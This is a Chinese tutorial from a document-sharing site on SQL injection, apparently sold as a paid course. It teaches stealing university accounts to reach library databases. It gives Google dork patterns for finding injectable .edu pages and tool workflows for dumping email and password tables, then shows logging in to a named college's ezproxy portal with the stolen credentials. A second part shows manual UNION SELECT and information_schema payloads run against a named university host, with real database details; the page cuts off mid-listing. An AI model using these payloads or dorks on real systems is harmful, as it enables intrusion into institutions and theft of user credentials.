初级检索班注入破解教程初级班

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

——注入、破解以及实例剖析破解Mica.edu帐号资源获取高校资源很重要的一个方法就是数据库注入,如何获取这些注入点?如何利用这些注入点获取资源帐号?本教程将一一为你呈现!一、注入点获取和利用工具工欲善其事,必先利其器。下面先推荐常用的注入点获取和利用工具,然后结合实例进行讲解。1、啊D注入工具可以从网页直接获取注入点、Google等搜索引擎简易批量获取注入点,注入点检测的数据可以直接生成非常完善和易处理的txt文件。2、NBSI综合性较强,常和啊D检测出来的结果辅助使用,效果会更好。3、其它工具比如明小子(Domain3.5)、教主(HDSI)等工具大同小议,这里不在一一介绍。其中HDSI可用于php注入,一般采用啊D和NBSI就可以应付一般的注入点分析了。二、注入点获取语法、关键词最为经典的注入点获取就是采用啊D+Google,在啊D扫描注入点内输入Google网址,输入就可以看到很多结果。在啊D工具的下方会出现可用的注入连接。这就是常见的获取注入点的方法,怎么利用,将在实例中完整呈现。搜寻注入点的语法常见的有:Inurl:asp?idsite:.edu**(site后面是域名,可以更换域名进行搜索,比如常见的域名.edu.au,.ac.uk,.ca,.org,.com等,可以参考google各个国家的域名,可以将域名设置为site:.edu,或者site:ac.uk,site:.ca,site:edu.au,增加可以找到的注入点的数量。)Inurl:cfm?idsite:.edu**(其中cfm可以更换为为asp、aspx、jsp、php等,下面以xxx表示可替换)Inurl:xxx?idsite:***.edu**(其中***.edu为具体的学校,比如vt.edu,monash.edu.au等)另外在google提供的语法并不止这些,常见的googlehacking工具中就有,比如:等。这里不再过多介绍关键词的构造:在Inurl:xxx?idsite:***.edu等语句前面可以加入各种关键词,关键词的构造尤其重要,可以有针对性的构造关键词。由于注入可以找到用户名,密码,邮箱地址,大学网页中有那些需要学生输入用户名和密码?邮箱地址Email很显然,学校中的bbs、forum、blog中会有,于是可以添加关键词bbs或者forum,并综合域名设置为site:.edu,或者site:ac.uk,site:.ca,site:edu.au,增加可以找到的注入点的数量。拿到成员或者老师的用户名,不就更好了?于是,可以就有另一组针对性的检索词,facultyinurl:asp?id=site:***.edu,staffinurl:cfm?id=site:.edu.auemailinurl:page?idsite:.cabbsinurl:aspx?id=site:edubloginurl:jsp?id=site:.ac.ukforuminurl:php?id=site:monash.edu.au等,以上仅是举例,具体的要自己去发散思维和构造,请加入中级班和高级班进一步学习。下面将进行实例剖析三、注入点的利用(高校实例剖析)目标:工具:啊D+Google+NBSI搜索注入点在啊D下面会出现注入点点击注入检测会进入到下面界面,点击检测,可以看到啊D的检测结果先检测表段,选举要检测的最有可能存在帐号的表段,点击检测字段,选取我们最关注的email和password来检测内容,就可以看到帐号和密码。点击检测结果右键,保存内容就可以将所有结果保存,方便查看,在这点啊D要比NBSI做的好,它将注入点、所获得的表段以及内容结果都用txt保存下来,非常舒服。同样对于NBSI也是如此检测,如下所示,输入注入点,点击检测。要注意的是,有些时候当前的库没有我们想要的内容,我们可以点击跨库来查找内容,不过有些时候跨库不一定有权限看内容,要看运气了。应当注意,此处将以下两项选择,第一个不选择有有些些注注入入点点会出现编码错误问题,第二个则是要提前选择才能将结果保存,保存是选择保存路径和文件名比如1.htm。有些时候需要跨库找到其它库来列表找我们需要的信息,点击跨库,猜解,需要哪个库就将哪个库设为当前库,然后重新列表猜字段和内容。上图是我们保存后获得的帐号和密码,下面就是验证帐号和密码了,首先我们要找到mica.edu的ezproxy登陆地址,如何去找那?常用的有两种方法一就是我们可在google中搜索入口比如ezproxysite:mica.eduwebvpnsite:mica.edu或者loginsite:mica.edu等二就是直接访问网页,找到图书馆、research资源表、off-campus等,mica资源入口如下输入帐号和密码,比如点击登陆后,我们就可以看到并使用数据库所有的资源了选取资源就可以使用资源,这样我们就有了此学校的资源帐号和密码。事先声明:本文仅仅围绕mysql5.0以上版本数据库的点的手工注入方法进行交流和探讨,因现在的注入点mssql2000的居多,但随着网站安全的进步,注入点的判断准确度越来越低,且点也会越来越少,而mysql5.0以上数据库的注入很少有专用自动化的工具,低于5.0的版本如下所述没有增加information_schema结构,另外php的点一般多结合mysql的,一些大的站点更是mysql5.0以上版本的较多。常规的工具判断方式大多被网站过滤,特殊判断方式无现成工具可以使用。因此手工注入准确率高、灵活性强,同时可以对注入有更深层次的认识和学习。而mysql一般结合php脚本,这个点是asp的,比较独特。最近发现一个点,用啊D、明小子、NBSI和HDSI常规的注入工具基本上检测不到注入信息,这时正想练习手工注入,于是便有了下文。当然其它综合型的工具可以判断,但进行手工注入是本文的目的。目标:=markus数据库类型:mysql原理:mysql5.0以上版本比mssql2000增加了系统数据库information_schema的结构,它是用来存储数据库系统信息的,因此我们可以使用这种结构获取信息。mysql5存储的信息,注射中可以用到的几个表。|SCHEMATA――存储数据库名的,|——关键字段:SCHEMA_NAME,表示数据库名称|TABLES――存储表名的|——关键字段:TABLE_SCHEMA表示表所属的数据库名称;TABLE_NAME表示表的名称|COLUMNS――存储字段名的|——关键字段:COLUMNS_SCHEMA表示表所属的字段名称;COLUMNS_NAME表示所属的字段的名称可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。注入步骤:图片在附件中,按照步骤编辑打开浏览器,地址栏输入=markus观察页面本来的样子=markus'orderby30/*浏览器中输入后,回显和原页面一样的正确页面=markus'orderby31/*页面返回错误信息,表示存在30个=markus'and1=2unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*浏览器输入后,页面返回7,8,10,11=markus'and1=2unionselect1,2,3,4,5,6,7,database(),9,version(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*显示当前数据库版本为5.0.45,当前数据库为TG当前用户为itsidr@gisa.informatics.indiana.edu,是非root用户,权限不大,要是root,则可以直接执行其它命令。下面我们看当前库的内容,首先猜所有的库名=markus'and1=2unionselect1,2,3,4,5,6,7,8,9,SCHEMA_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30frominformation_schema.SCHEMATAlimit1,1/*第一条记录库名为TG=markus'and1=2unionselect1,2,3,4,5,6,7,8,9,SCHEMA_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30frominformation_schema.SCHEMATAlimit2,1/*第二条记录库名为TGTEST=markus'and1=2unionselect1,2,3,4,5,6,7,8,9,SCHEMA_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30frominformation_schema.SCHEMATAlimit3,1/*第三条记录库名为test=markus'and1=2unionselect1,2,3,4,5,6,7,8,9,SCHEMA_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30frominformation_schema.SCHEMATAlimit4,1/*此时报错,所有库列取完毕0x5447为TG的16进制编码,下面我们遍历TG库里面的表名,找到敏感的表=markus'and1=2unionselect1,2,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30frominformation_schema.TABLESwhereTABLE_SCHEMA=0x5447limit36,1/*将limit36,1/*为36时报错,36改为35时正确,说明只有35个表同上,一一列取表名,只需将limit36,1/*这里的36改为从1到35即可,不再一一列取,只给出我所获得的结果前面的数字为limit后的数字,后面为浏览器显示的结果1BRAND2BUILDING3COMMUNICATI

1 / 14
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功